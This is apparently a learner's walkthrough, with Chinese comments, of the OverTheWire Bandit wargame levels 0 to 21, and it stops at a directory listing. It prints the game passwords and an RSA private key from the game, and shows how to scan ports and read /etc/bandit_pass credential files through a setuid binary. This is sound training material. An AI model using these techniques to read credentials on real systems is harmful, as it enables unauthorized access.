拿到密码即可进入下一关

Level 0

bandit0@bandit:~$ cat readme 
Congratulations on your first steps into the bandit game!!
Please make sure you have read the rules at https://overthewire.org/rules/
If you are following a course, workshop, walkthrough or other educational activity,
please inform the instructor about the rules as well and encourage them to
contribute to the OverTheWire community so we can keep these games free!

The password you are looking for is: ZjLjTmM6FvvyRnrb2rfNWOZOTa6ip5If

Level 1

bandit1@bandit:~$ ll
total 24
-rw-r-----  1 bandit2 bandit1   33 Sep 19 07:08 -
drwxr-xr-x  2 root    root    4096 Sep 19 07:08 ./
drwxr-xr-x 70 root    root    4096 Sep 19 07:09 ../
-rw-r--r--  1 root    root     220 Mar 31  2024 .bash_logout
-rw-r--r--  1 root    root    3771 Mar 31  2024 .bashrc
-rw-r--r--  1 root    root     807 Mar 31  2024 .profile
bandit1@bandit:~$ cat ./-
263JGJPfgU6LtdEvgfWU1XP5yac29mFx

Level 2

bandit2@bandit:~$ ls -al
total 24
drwxr-xr-x  2 root    root    4096 Sep 19 07:08 .
drwxr-xr-x 70 root    root    4096 Sep 19 07:09 ..
-rw-r--r--  1 root    root     220 Mar 31  2024 .bash_logout
-rw-r--r--  1 root    root    3771 Mar 31  2024 .bashrc
-rw-r--r--  1 root    root     807 Mar 31  2024 .profile
-rw-r-----  1 bandit3 bandit2   33 Sep 19 07:08 spaces in this filename
bandit2@bandit:~$ cat "spaces in this filename"
MNk8KNH3Usiio41PRUEoDFPqfxLPlSmx

Level 3

bandit3@bandit:~$ ls -al
total 24
drwxr-xr-x  3 root root 4096 Sep 19 07:08 .
drwxr-xr-x 70 root root 4096 Sep 19 07:09 ..
-rw-r--r--  1 root root  220 Mar 31  2024 .bash_logout
-rw-r--r--  1 root root 3771 Mar 31  2024 .bashrc
drwxr-xr-x  2 root root 4096 Sep 19 07:08 inhere
-rw-r--r--  1 root root  807 Mar 31  2024 .profile
bandit3@bandit:~$ cd inhere/
bandit3@bandit:~/inhere$ ls -al
total 12
drwxr-xr-x 2 root    root    4096 Sep 19 07:08 .
drwxr-xr-x 3 root    root    4096 Sep 19 07:08 ..
-rw-r----- 1 bandit4 bandit3   33 Sep 19 07:08 ...Hiding-From-You
bandit3@bandit:~/inhere$ cat ...Hiding-From-You 
2WmrDFRmJIq3IPxneAaMGhap0pFhF3NJ

Level 4

bandit4@bandit:~$ ls -al
total 24
drwxr-xr-x  3 root root 4096 Sep 19 07:08 .
drwxr-xr-x 70 root root 4096 Sep 19 07:09 ..
-rw-r--r--  1 root root  220 Mar 31  2024 .bash_logout
-rw-r--r--  1 root root 3771 Mar 31  2024 .bashrc
drwxr-xr-x  2 root root 4096 Sep 19 07:08 inhere
-rw-r--r--  1 root root  807 Mar 31  2024 .profile
bandit4@bandit:~$ cd inhere/
bandit4@bandit:~/inhere$ ls -al
total 48
drwxr-xr-x 2 root    root    4096 Sep 19 07:08 .
drwxr-xr-x 3 root    root    4096 Sep 19 07:08 ..
-rw-r----- 1 bandit5 bandit4   33 Sep 19 07:08 -file00
-rw-r----- 1 bandit5 bandit4   33 Sep 19 07:08 -file01
-rw-r----- 1 bandit5 bandit4   33 Sep 19 07:08 -file02
-rw-r----- 1 bandit5 bandit4   33 Sep 19 07:08 -file03
-rw-r----- 1 bandit5 bandit4   33 Sep 19 07:08 -file04
-rw-r----- 1 bandit5 bandit4   33 Sep 19 07:08 -file05
-rw-r----- 1 bandit5 bandit4   33 Sep 19 07:08 -file06
-rw-r----- 1 bandit5 bandit4   33 Sep 19 07:08 -file07
-rw-r----- 1 bandit5 bandit4   33 Sep 19 07:08 -file08
-rw-r----- 1 bandit5 bandit4   33 Sep 19 07:08 -file09
bandit4@bandit:~/inhere$ cat ./-file0*
�p��&�y�,�(jo�.at�:uf�^���@i�R�,�Λ�:Y���?�%�A����B��ͩ�3�	�)Ʈ�#Y��-6c��IR-�$����:�����/�
                                                                                      ������qGi��,�2�Yb�
dۙ�rOx����h0~ey
��c�~�h�n��G1}���ߓ��ߤ��W>��#lk�d�ܮ��yE��6�0]�\�$�1�%�������o@��b/��4oQYVPkxZOOEOO5pTW81FB8j8lxXGUQw
�nS�
�<��]�
W��e�˥m�����O��D��2g��?�����`>5HYA�u���8�g�`0�$`��

Level 5

The password for the next level is stored in a file somewhere under the inhere directory and has all of the following properties:

human-readable
1033 bytes in size
not executable
bandit5@bandit:~/inhere$ find . -type f -size 1033c ! -executable
./maybehere07/.file2
bandit5@bandit:~/inhere$ cat `!!`
cat `find . -type f -size 1033c ! -executable`
HWasnPhtq9AVKe0dmk45nxy20cvUa6EG

Level 6

The password for the next level is stored somewhere on the server and has all of the following properties:

owned by user bandit7
owned by group bandit6
33 bytes in size
bandit6@bandit:~$ ls -al
total 20
drwxr-xr-x  2 root root 4096 Sep 19 07:08 .
drwxr-xr-x 70 root root 4096 Sep 19 07:09 ..
-rw-r--r--  1 root root  220 Mar 31  2024 .bash_logout
-rw-r--r--  1 root root 3771 Mar 31  2024 .bashrc
-rw-r--r--  1 root root  807 Mar 31  2024 .profile
bandit6@bandit:~$ find / -user bandit7 -group bandit6 -size 33c 2>/dev/null
/var/lib/dpkg/info/bandit7.password
bandit6@bandit:~$ cat `!!`
cat `find / -user bandit7 -group bandit6 -size 33c 2>/dev/null`
morbNTDkSW6jIlUc0ymOdMaLnOlFVAaj

Level 7

The password for the next level is stored in the file data.txt next to the word millionth
bandit7@bandit:~$ cat data.txt  |grep millionth
millionth	dfwvzFQi4mU0wfNbFOe9RoWskMLg7eEc

Level 8

The password for the next level is stored in the file data.txt and is the only line of text that occurs only once
bandit8@bandit:~$ cat data.txt  | sort | uniq -u
4CKMh1JI91bUIZZPXDqGanal4xvAg0JM

uniq -u:输入只出现一次的行

Level 9

The password for the next level is stored in the file data.txt in one of the few human-readable strings, preceded by several ‘=’ characters.
bandit9@bandit:~$ ls -al
total 40
drwxr-xr-x  2 root     root     4096 Sep 19 07:08 .
drwxr-xr-x 70 root     root     4096 Sep 19 07:09 ..
-rw-r--r--  1 root     root      220 Mar 31  2024 .bash_logout
-rw-r--r--  1 root     root     3771 Mar 31  2024 .bashrc
-rw-r-----  1 bandit10 bandit9 19379 Sep 19 07:08 data.txt
-rw-r--r--  1 root     root      807 Mar 31  2024 .profile
bandit9@bandit:~$ cat data.txt  |grep ==
grep: (standard input): binary file matches
bandit9@bandit:~$ strings data.txt  |grep ==
}========== the
3JprD========== passwordi
~fDV3========== is
D9========== FGUW5ilLVJrxX9kMYMmlN4MgbpfMiqey

Level 10

The password for the next level is stored in the file data.txt, which contains base64 encoded data
bandit10@bandit:~$ cat data.txt | grep =
VGhlIHBhc3N3b3JkIGlzIGR0UjE3M2ZaS2IwUlJzREZTR3NnMlJXbnBOVmozcVJyCg==
bandit10@bandit:~$ echo `!!` | base64 -d
echo `cat data.txt | grep =` | base64 -d
The password is dtR173fZKb0RRsDFSGsg2RWnpNVj3qRr

Level 11

The password for the next level is stored in the file data.txt, where all lowercase (a-z) and uppercase (A-Z) letters have been rotated by 13 positions

rot13

bandit11@bandit:~$ ls -al
total 24
drwxr-xr-x  2 root     root     4096 Sep 19 07:08 .
drwxr-xr-x 70 root     root     4096 Sep 19 07:09 ..
-rw-r--r--  1 root     root      220 Mar 31  2024 .bash_logout
-rw-r--r--  1 root     root     3771 Mar 31  2024 .bashrc
-rw-r-----  1 bandit12 bandit11   49 Sep 19 07:08 data.txt
-rw-r--r--  1 root     root      807 Mar 31  2024 .profile
bandit11@bandit:~$ cat data.txt 
Gur cnffjbeq vf 7k16JArUVv5LxVuJfsSVdbbtaHGlw9D4
bandit11@bandit:~$ cat data.txt | tr 'a-zA-Z' 'n-za-mN-ZA-M'
The password is 7x16WNeHIi5YkIhWsfFIqoognUTyj9Q4

Level 12

The password for the next level is stored in the file data.txt, which is a hexdump of a file that has been repeatedly compressed. For this level it may be useful to create a directory under /tmp in which you can work. Use mkdir with a hard to guess directory name. Or better, use the command “mktemp -d”. Then copy the datafile using cp, and rename it using mv (read the manpages!)
bandit12@bandit:/tmp$ mkdir bb
bandit12@bandit:/tmp$ cd bb
bandit12@bandit:/tmp/bb$ cp ~/data.txt .
bandit12@bandit:/tmp/bb$ xxd -r data.txt  >file0
bandit12@bandit:/tmp/bb$ file file0
file0: gzip compressed data, was "data2.bin", last modified: Thu Sep 19 07:08:15 2024, max compression, from Unix, original size modulo 2^32 574
bandit12@bandit:/tmp/bb$ mv file0 file0.gz
bandit12@bandit:/tmp/bb$ ls -al
total 1220
drwxrwxr-x     2 bandit12 bandit12    4096 Oct 22 02:51 .
drwxrwx-wt 24080 root     root     1232896 Oct 22 02:51 ..
-rw-r-----     1 bandit12 bandit12    2583 Oct 22 02:47 data.txt
-rw-rw-r--     1 bandit12 bandit12     607 Oct 22 02:51 file0.gz
bandit12@bandit:/tmp/bb$ gunzip file0.gz 
bandit12@bandit:/tmp/bb$ ls -al
total 1220
drwxrwxr-x     2 bandit12 bandit12    4096 Oct 22 02:51 .
drwxrwx-wt 24080 root     root     1232896 Oct 22 02:51 ..
-rw-r-----     1 bandit12 bandit12    2583 Oct 22 02:47 data.txt
-rw-rw-r--     1 bandit12 bandit12     574 Oct 22 02:51 file0
bandit12@bandit:/tmp/bb$ file file0
file0: bzip2 compressed data, block size = 900k
bandit12@bandit:/tmp/bb$ bunzip2 file0
bunzip2: Can't guess original name for file0 -- using file0.out
bandit12@bandit:/tmp/bb$ ls
data.txt  file0.out
bandit12@bandit:/tmp/bb$ file file0.out 
file0.out: gzip compressed data, was "data4.bin", last modified: Thu Sep 19 07:08:15 2024, max compression, from Unix, original size modulo 2^32 20480
bandit12@bandit:/tmp/bb$ gunzip file0.out
gzip: file0.out: unknown suffix -- ignored
bandit12@bandit:/tmp/bb$ mv file0.out file1.gz
bandit12@bandit:/tmp/bb$ gunzip file1.gz 
bandit12@bandit:/tmp/bb$ ls
data.txt  file1
bandit12@bandit:/tmp/bb$ file file1
file1: POSIX tar archive (GNU)
bandit12@bandit:/tmp/bb$ tar xvf file1
data5.bin
bandit12@bandit:/tmp/bb$ file data5.bin 
data5.bin: POSIX tar archive (GNU)
bandit12@bandit:/tmp/bb$ tar xvf data5.bin
data6.bin
bandit12@bandit:/tmp/bb$ file data
data: cannot open `data' (No such file or directory)
bandit12@bandit:/tmp/bb$ file data6.bin 
data6.bin: bzip2 compressed data, block size = 900k
bandit12@bandit:/tmp/bb$ bunzip2 data6.bin
bunzip2: Can't guess original name for data6.bin -- using data6.bin.out
bandit12@bandit:/tmp/bb$ ls
data5.bin  data6.bin.out  data.txt  file1
bandit12@bandit:/tmp/bb$ file data6.bin.out 
data6.bin.out: POSIX tar archive (GNU)
bandit12@bandit:/tmp/bb$ tar xvf data6.bin.out
data8.bin
bandit12@bandit:/tmp/bb$ file data8.bin 
data8.bin: gzip compressed data, was "data9.bin", last modified: Thu Sep 19 07:08:15 2024, max compression, from Unix, original size modulo 2^32 49
bandit12@bandit:/tmp/bb$ mv data8.bin data8.gz
bandit12@bandit:/tmp/bb$ gunzip data8.gz 
bandit12@bandit:/tmp/bb$ ls
data5.bin  data6.bin.out  data8  data.txt  file1
bandit12@bandit:/tmp/bb$ file data8
data8: ASCII text
bandit12@bandit:/tmp/bb$ cat data8
The password is FO5dwFsc0cbaIiH0h8J2eUks2vdTDwAn

套娃折磨鬼

Level 13

The password for the next level is stored in /etc/bandit_pass/bandit14 and can only be read by user bandit14. For this level, you don’t get the next password, but you get a private SSH key that can be used to log into the next level. Note: localhost is a hostname that refers to the machine you are working on
bandit13@bandit:~$ ssh bandit14@localhost -i sshkey.private  -p 2220

Level 14

The password for the next level can be retrieved by submitting the password of the current level to port 30000 on localhost.
bandit14@bandit:~$ cat /etc/bandit_pass/bandit14
MU4VWeTyJk8ROof1qqmcBPaLh7lDCPvS
bandit14@bandit:~$ nc 127.0.0.1 30000
MU4VWeTyJk8ROof1qqmcBPaLh7lDCPvS
Correct!
8xCjnmgoKbGLhHFAZlGE5Tmu4M2tKJQo

Level 15

The password for the next level can be retrieved by submitting the password of the current level to port 30001 on localhost using SSL/TLS encryption.

Helpful note: Getting “DONE”, “RENEGOTIATING” or “KEYUPDATE”? Read the “CONNECTED COMMANDS” section in the manpage.
bandit15@bandit:~$ openssl s_client -connect localhost:30001
CONNECTED(00000003)
Can't use SSL_get_servername
depth=0 CN = SnakeOil
verify error:num=18:self-signed certificate
verify return:1
depth=0 CN = SnakeOil
verify return:1
---
Certificate chain
 0 s:CN = SnakeOil
   i:CN = SnakeOil
   a:PKEY: rsaEncryption, 4096 (bit); sigalg: RSA-SHA256
   v:NotBefore: Jun 10 03:59:50 2024 GMT; NotAfter: Jun  8 03:59:50 2034 GMT
---
Server certificate
-----BEGIN CERTIFICATE-----
MIIFBzCCAu+gAwIBAgIUBLz7DBxA0IfojaL/WaJzE6Sbz7cwDQYJKoZIhvcNAQEL
BQAwEzERMA8GA1UEAwwIU25ha2VPaWwwHhcNMjQwNjEwMDM1OTUwWhcNMzQwNjA4
MDM1OTUwWjATMREwDwYDVQQDDAhTbmFrZU9pbDCCAiIwDQYJKoZIhvcNAQEBBQAD
ggIPADCCAgoCggIBANI+P5QXm9Bj21FIPsQqbqZRb5XmSZZJYaam7EIJ16Fxedf+
jXAv4d/FVqiEM4BuSNsNMeBMx2Gq0lAfN33h+RMTjRoMb8yBsZsC063MLfXCk4p+
09gtGP7BS6Iy5XdmfY/fPHvA3JDEScdlDDmd6Lsbdwhv93Q8M6POVO9sv4HuS4t/
jEjr+NhE+Bjr/wDbyg7GL71BP1WPZpQnRE4OzoSrt5+bZVLvODWUFwinB0fLaGRk
GmI0r5EUOUd7HpYyoIQbiNlePGfPpHRKnmdXTTEZEoxeWWAaM1VhPGqfrB/Pnca+
vAJX7iBOb3kHinmfVOScsG/YAUR94wSELeY+UlEWJaELVUntrJ5HeRDiTChiVQ++
wnnjNbepaW6shopybUF3XXfhIb4NvwLWpvoKFXVtcVjlOujF0snVvpE+MRT0wacy
tHtjZs7Ao7GYxDz6H8AdBLKJW67uQon37a4MI260ADFMS+2vEAbNSFP+f6ii5mrB
18cY64ZaF6oU8bjGK7BArDx56bRc3WFyuBIGWAFHEuB948BcshXY7baf5jjzPmgz
mq1zdRthQB31MOM2ii6vuTkheAvKfFf+llH4M9SnES4NSF2hj9NnHga9V08wfhYc
x0W6qu+S8HUdVF+V23yTvUNgz4Q+UoGs4sHSDEsIBFqNvInnpUmtNgcR2L5PAgMB
AAGjUzBRMB0GA1UdDgQWBBTPo8kfze4P9EgxNuyk7+xDGFtAYzAfBgNVHSMEGDAW
gBTPo8kfze4P9EgxNuyk7+xDGFtAYzAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3
DQEBCwUAA4ICAQAKHomtmcGqyiLnhziLe97Mq2+Sul5QgYVwfx/KYOXxv2T8ZmcR
Ae9XFhZT4jsAOUDK1OXx9aZgDGJHJLNEVTe9zWv1ONFfNxEBxQgP7hhmDBWdtj6d
taqEW/Jp06X+08BtnYK9NZsvDg2YRcvOHConeMjwvEL7tQK0m+GVyQfLYg6jnrhx
egH+abucTKxabFcWSE+Vk0uJYMqcbXvB4WNKz9vj4V5Hn7/DN4xIjFko+nREw6Oa
/AUFjNnO/FPjap+d68H1LdzMH3PSs+yjGid+6Zx9FCnt9qZydW13Miqg3nDnODXw
+Z682mQFjVlGPCA5ZOQbyMKY4tNazG2n8qy2famQT3+jF8Lb6a4NGbnpeWnLMkIu
jWLWIkA9MlbdNXuajiPNVyYIK9gdoBzbfaKwoOfSsLxEqlf8rio1GGcEV5Hlz5S2
txwI0xdW9MWeGWoiLbZSbRJH4TIBFFtoBG0LoEJi0C+UPwS8CDngJB4TyrZqEld3
rH87W+Et1t/Nepoc/Eoaux9PFp5VPXP+qwQGmhir/hv7OsgBhrkYuhkjxZ8+1uk7
tUWC/XM0mpLoxsq6vVl3AJaJe1ivdA9xLytsuG4iv02Juc593HXYR8yOpow0Eq2T
U5EyeuFg5RXYwAPi7ykw1PW7zAPL4MlonEVz+QXOSx6eyhimp1VZC11SCg==
-----END CERTIFICATE-----
subject=CN = SnakeOil
issuer=CN = SnakeOil
---
No client certificate CA names sent
Peer signing digest: SHA256
Peer signature type: RSA-PSS
Server Temp Key: X25519, 253 bits
---
SSL handshake has read 2103 bytes and written 373 bytes
Verification error: self-signed certificate
---
New, TLSv1.3, Cipher is TLS_AES_256_GCM_SHA384
Server public key is 4096 bit
Secure Renegotiation IS NOT supported
Compression: NONE
Expansion: NONE
No ALPN negotiated
Early data was not sent
Verify return code: 18 (self-signed certificate)
---
---
Post-Handshake New Session Ticket arrived:
SSL-Session:
    Protocol  : TLSv1.3
    Cipher    : TLS_AES_256_GCM_SHA384
    Session-ID: 7ABCCC972E3E42959886B62B7EF0EDBAED3477D05EAB13002B52CEB09B0B8184
    Session-ID-ctx: 
    Resumption PSK: A763018EEC3ED58EF10A2FEDD26A48DB7F4494DAE851DC6BE70D4C2CC9B92703F4B99ADA68BF2F935BB9E1B1E67A82B1
    PSK identity: None
    PSK identity hint: None
    SRP username: None
    TLS session ticket lifetime hint: 300 (seconds)
    TLS session ticket:
    0000 - c0 c6 3d 9e 22 a9 6f a8-d6 08 ea 57 e8 ec 3e f7   ..=.".o....W..>.
    0010 - 3c 6b 7c 58 18 37 d6 bf-d2 3c b2 96 a2 bd d3 39   <k|X.7...<.....9
    0020 - 76 19 7d 4c 5b 4e 5f a7-a0 48 0d fb 5c 91 c9 19   v.}L[N_..H..\...
    0030 - a0 5a e8 a0 6c 02 ad 69-a2 57 13 a0 40 aa c9 71   .Z..l..i.W..@..q
    0040 - b2 03 af c7 52 84 6e 00-bc 98 75 83 3c 30 56 33   ....R.n...u.<0V3
    0050 - 8f e2 cc a2 6c f4 8e 09-cb ac 1f 57 c6 b3 5d fd   ....l......W..].
    0060 - 2e fc c5 2d 42 18 7b 81-76 28 85 2c 1f 6a 09 d4   ...-B.{.v(.,.j..
    0070 - 73 14 00 34 d0 2c 3d cf-4b d1 2b 6e 6e 61 67 20   s..4.,=.K.+nnag 
    0080 - e2 dd 34 d3 e3 74 31 69-ea ba 16 56 da 23 34 e3   ..4..t1i...V.#4.
    0090 - 4a 0d 6d f8 4c 98 f6 6b-af e5 ad 36 ea ea 95 6e   J.m.L..k...6...n
    00a0 - 5c 15 c0 2a cb f7 a1 04-1b c0 2d 5b 52 52 5e cb   \..*......-[RR^.
    00b0 - 52 1d 36 d7 ec a4 df 74-21 26 65 17 f8 30 49 3f   R.6....t!&e..0I?
    00c0 - 65 c2 1e db 9a c3 02 ec-58 d1 2f 1b 37 b8 08 fb   e.......X./.7...
    00d0 - 5b cb 9f e1 d3 1b de d1-7b 56 6a 2d cf 2d e4 f2   [.......{Vj-.-..

    Start Time: 1729572986
    Timeout   : 7200 (sec)
    Verify return code: 18 (self-signed certificate)
    Extended master secret: no
    Max Early Data: 0
---
read R BLOCK
---
Post-Handshake New Session Ticket arrived:
SSL-Session:
    Protocol  : TLSv1.3
    Cipher    : TLS_AES_256_GCM_SHA384
    Session-ID: 7DFD7B0D51B642DFD679C2A9B741273AF15A4A336F4082372794D8E0648E88D1
    Session-ID-ctx: 
    Resumption PSK: 3F6CEF3D60A951CFDB81CEAF77956C8D269535548BE4379280658695C9CAC589B8FC4AF5F4FC0B73EB4804F6FD3CC86F
    PSK identity: None
    PSK identity hint: None
    SRP username: None
    TLS session ticket lifetime hint: 300 (seconds)
    TLS session ticket:
    0000 - c0 c6 3d 9e 22 a9 6f a8-d6 08 ea 57 e8 ec 3e f7   ..=.".o....W..>.
    0010 - 01 aa c4 f2 c1 7b da cf-b5 0c f4 66 8e 2d 06 82   .....{.....f.-..
    0020 - 49 f9 52 f9 27 0b f0 5b-18 04 38 4f 09 51 32 9a   I.R.'..[..8O.Q2.
    0030 - 81 6e 16 f2 65 15 83 6c-11 22 1e a4 b7 9c 51 7c   .n..e..l."....Q|
    0040 - 22 18 2d 68 29 bc 32 c2-99 51 63 f9 62 6b 4d dc   ".-h).2..Qc.bkM.
    0050 - 3b 93 fb 7a 77 ba f4 b2-b5 65 5c 42 64 8b 77 73   ;..zw....e\Bd.ws
    0060 - 4b 16 4c d9 11 18 42 8e-73 cf 35 db f9 6c 40 40   K.L...B.s.5..l@@
    0070 - b1 fd bf 66 31 b7 bf f5-14 0e bf a5 18 2e 07 72   ...f1..........r
    0080 - 23 d3 84 b8 d9 a4 20 c1-1b 15 a2 8c e5 36 d8 a8   #..... ......6..
    0090 - 2e 60 a5 55 39 3f 20 4d-5a 83 ee cc db 33 c0 46   .`.U9? MZ....3.F
    00a0 - 7b 0c 1c 5c 58 61 62 09-50 ac e2 ab 3e 7a 4f 6a   {..\Xab.P...>zOj
    00b0 - 29 cc 6c 48 0d b7 b6 e3-eb e9 b3 c5 6a 81 1d 2f   ).lH........j../
    00c0 - 05 f0 67 d2 45 8b 92 13-00 c7 03 91 f8 55 18 77   ..g.E........U.w
    00d0 - 91 11 77 45 f5 7a cb ca-43 0b 41 51 89 d1 d3 0e   ..wE.z..C.AQ....

    Start Time: 1729572986
    Timeout   : 7200 (sec)
    Verify return code: 18 (self-signed certificate)
    Extended master secret: no
    Max Early Data: 0
---
read R BLOCK
8xCjnmgoKbGLhHFAZlGE5Tmu4M2tKJQo
Correct!
kSkvUpMQ7lBYyCM4GBPvCvT1BfWRy0Dx

closed

Level 16

The credentials for the next level can be retrieved by submitting the password of the current level to a port on localhost in the range 31000 to 32000. First find out which of these ports have a server listening on them. Then find out which of those speak SSL/TLS and which don’t. There is only 1 server that will give the next credentials, the others will simply send back to you whatever you send to it.

Helpful note: Getting “DONE”, “RENEGOTIATING” or “KEYUPDATE”? Read the “CONNECTED COMMANDS” section in the manpage.
bandit16@bandit:~$ nmap localhost -p 31000-32000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-22 05:19 UTC
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00012s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT      STATE SERVICE
31046/tcp open  unknown
31518/tcp open  unknown
31691/tcp open  unknown
31790/tcp open  unknown
31960/tcp open  unknown
Nmap done: 1 IP address (1 host up) scanned in 0.08 seconds

几个端口都试一下,结果要么不行,要么updatekey,我真*了,然后在群里找到了解决方法

bandit16@bandit:~$ openssl s_client -connect localhost:31790 -ign_eof
...
...
read R BLOCK
kSkvUpMQ7lBYyCM4GBPvCvT1BfWRy0Dx
Correct!
-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEAvmOkuifmMg6HL2YPIOjon6iWfbp7c3jx34YkYWqUH57SUdyJ
imZzeyGC0gtZPGujUSxiJSWI/oTqexh+cAMTSMlOJf7+BrJObArnxd9Y7YT2bRPQ
Ja6Lzb558YW3FZl87ORiO+rW4LCDCNd2lUvLE/GL2GWyuKN0K5iCd5TbtJzEkQTu
DSt2mcNn4rhAL+JFr56o4T6z8WWAW18BR6yGrMq7Q/kALHYW3OekePQAzL0VUYbW
JGTi65CxbCnzc/w4+mqQyvmzpWtMAzJTzAzQxNbkR2MBGySxDLrjg0LWN6sK7wNX
x0YVztz/zbIkPjfkU1jHS+9EbVNj+D1XFOJuaQIDAQABAoIBABagpxpM1aoLWfvD
KHcj10nqcoBc4oE11aFYQwik7xfW+24pRNuDE6SFthOar69jp5RlLwD1NhPx3iBl
J9nOM8OJ0VToum43UOS8YxF8WwhXriYGnc1sskbwpXOUDc9uX4+UESzH22P29ovd
d8WErY0gPxun8pbJLmxkAtWNhpMvfe0050vk9TL5wqbu9AlbssgTcCXkMQnPw9nC
YNN6DDP2lbcBrvgT9YCNL6C+ZKufD52yOQ9qOkwFTEQpjtF4uNtJom+asvlpmS8A
vLY9r60wYSvmZhNqBUrj7lyCtXMIu1kkd4w7F77k+DjHoAXyxcUp1DGL51sOmama
+TOWWgECgYEA8JtPxP0GRJ+IQkX262jM3dEIkza8ky5moIwUqYdsx0NxHgRRhORT
8c8hAuRBb2G82so8vUHk/fur85OEfc9TncnCY2crpoqsghifKLxrLgtT+qDpfZnx
SatLdt8GfQ85yA7hnWWJ2MxF3NaeSDm75Lsm+tBbAiyc9P2jGRNtMSkCgYEAypHd
HCctNi/FwjulhttFx/rHYKhLidZDFYeiE/v45bN4yFm8x7R/b0iE7KaszX+Exdvt
SghaTdcG0Knyw1bpJVyusavPzpaJMjdJ6tcFhVAbAjm7enCIvGCSx+X3l5SiWg0A
R57hJglezIiVjv3aGwHwvlZvtszK6zV6oXFAu0ECgYAbjo46T4hyP5tJi93V5HDi
Ttiek7xRVxUl+iU7rWkGAXFpMLFteQEsRr7PJ/lemmEY5eTDAFMLy9FL2m9oQWCg
R8VdwSk8r9FGLS+9aKcV5PI/WEKlwgXinB3OhYimtiG2Cg5JCqIZFHxD6MjEGOiu
L8ktHMPvodBwNsSBULpG0QKBgBAplTfC1HOnWiMGOU3KPwYWt0O6CdTkmJOmL8Ni
blh9elyZ9FsGxsgtRBXRsqXuz7wtsQAgLHxbdLq/ZJQ7YfzOKU4ZxEnabvXnvWkU
YOdjHdSOoKvDQNWu6ucyLRAWFuISeXw9a/9p7ftpxm0TSgyvmfLF2MIAEwyzRqaM
77pBAoGAMmjmIJdjp+Ez8duyn3ieo36yrttF5NSsJLAbxFpdlc1gvtGCWW+9Cq0b
dxviW8+TFVEBl1O4f7HVm6EpTscdDxU+bCXWkfjuRb7Dy9GOtt9JPsX8MBTakzh3
vBgsyi/sN3RqRBcGU40fOoZyfAMT8s1m/uYv52O6IgeuZ/ujbjY=
-----END RSA PRIVATE KEY-----

closed

-ign_eof:忽略EOF,继续等待服务器输入

Level 17

There are 2 files in the homedirectory: passwords.old and passwords.new. The password for the next level is in passwords.new and is the only line that has been changed between passwords.old and passwords.new

NOTE: if you have solved this level and see ‘Byebye!’ when trying to log into bandit18, this is related to the next level, bandit19
bandit17@bandit:~$ diff passwords.old  passwords.new
42c42
< ktfgBvpMzWKR5ENj26IbLGSblgUG9CzB
---
> x2gLTTjFwMOhQ8oWNbMN362QKxfRqGlO

Level 18

The password for the next level is stored in a file readme in the homedirectory. Unfortunately, someone has modified .bashrc to log you out when you log in with SSH.

用密码连接之后秒退,因为设置了bashrc,可以在连接后面跟上指令,跟nc差不多

╭─ ~                                                                                          ✔ │ root@ta0 │ 13:33:28 
╰─ ssh bandit18@bandit.labs.overthewire.org -p 2220 ls -al
                         _                     _ _ _   
                        | |__   __ _ _ __   __| (_) |_ 
                        | '_ \ / _` | '_ \ / _` | | __|
                        | |_) | (_| | | | | (_| | | |_ 
                        |_.__/ \__,_|_| |_|\__,_|_|\__|
                                                       

                      This is an OverTheWire game server. 
            More information on http://www.overthewire.org/wargames

bandit18@bandit.labs.overthewire.org's password: 
total 24
drwxr-xr-x  2 root     root     4096 Sep 19 07:08 .
drwxr-xr-x 70 root     root     4096 Sep 19 07:09 ..
-rw-r--r--  1 root     root      220 Mar 31  2024 .bash_logout
-rw-r-----  1 bandit19 bandit18 3794 Sep 19 07:08 .bashrc
-rw-r--r--  1 root     root      807 Mar 31  2024 .profile
-rw-r-----  1 bandit19 bandit18   33 Sep 19 07:08 readme
╭─ ~                                                                                    ✔ │ 10s │ root@ta0 │ 13:33:42 
╰─ ssh bandit18@bandit.labs.overthewire.org -p 2220 cat readme
                         _                     _ _ _   
                        | |__   __ _ _ __   __| (_) |_ 
                        | '_ \ / _` | '_ \ / _` | | __|
                        | |_) | (_| | | | | (_| | | |_ 
                        |_.__/ \__,_|_| |_|\__,_|_|\__|
                                                       

                      This is an OverTheWire game server. 
            More information on http://www.overthewire.org/wargames

bandit18@bandit.labs.overthewire.org's password: 
cGWpMaKXVwDUNgPAVJbWYuGHVn9zl3j8

Level 19

To gain access to the next level, you should use the setuid binary in the homedirectory. Execute it without arguments to find out how to use it. The password for this level can be found in the usual place (/etc/bandit_pass), after you have used the setuid binary.
bandit19@bandit:~$ ./bandit20-do 
Run a command as another user.
  Example: ./bandit20-do id
bandit19@bandit:~$ ./bandit20-do  id
uid=11019(bandit19) gid=11019(bandit19) euid=11020(bandit20) groups=11019(bandit19)
bandit19@bandit:~$ ./bandit20-do  whoami
bandit20
bandit19@bandit:~$ ./bandit20-do  cat /etc/bandit_pass
cat: /etc/bandit_pass: Is a directory
bandit19@bandit:~$ ./bandit20-do  ls /etc/bandit_pass
bandit0   bandit11  bandit14  bandit17	bandit2   bandit22  bandit25  bandit28	bandit30  bandit33  bandit6  bandit9
bandit1   bandit12  bandit15  bandit18	bandit20  bandit23  bandit26  bandit29	bandit31  bandit4   bandit7
bandit10  bandit13  bandit16  bandit19	bandit21  bandit24  bandit27  bandit3	bandit32  bandit5   bandit8
bandit19@bandit:~$ ./bandit20-do  cat /etc/bandit_pass/bandit20
0qXahG8ZjOVMN9Ghs7iOWsCfZyXOUbYO

Level 20

There is a setuid binary in the homedirectory that does the following: it makes a connection to localhost on the port you specify as a commandline argument. It then reads a line of text from the connection and compares it to the password in the previous level (bandit20). If the password is correct, it will transmit the password for the next level (bandit21).

NOTE: Try connecting to your own network daemon to see if it works as you think
bandit20@bandit:~$ echo -n "0qXahG8ZjOVMN9Ghs7iOWsCfZyXOUbYO" | nc -lp 4567&
[2] 1693593
bandit20@bandit:~$ ./suconnect 4567
Read: 0qXahG8ZjOVMN9Ghs7iOWsCfZyXOUbYO
Password matches, sending next password
EeoULMCra2q0dSkYj561DX7s1CpBuOBt

Level 21

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
bandit21@bandit:/etc/cron.d$ ls -al
total 44
drwxr-xr-x   2 root root  4096 Sep 19 07:10 .
drwxr-xr-x 121 root root 12288 Sep 20 18:37 ..
-rw-r--r--   1 root root   120 Sep 19 07:08 cronjob_bandit22
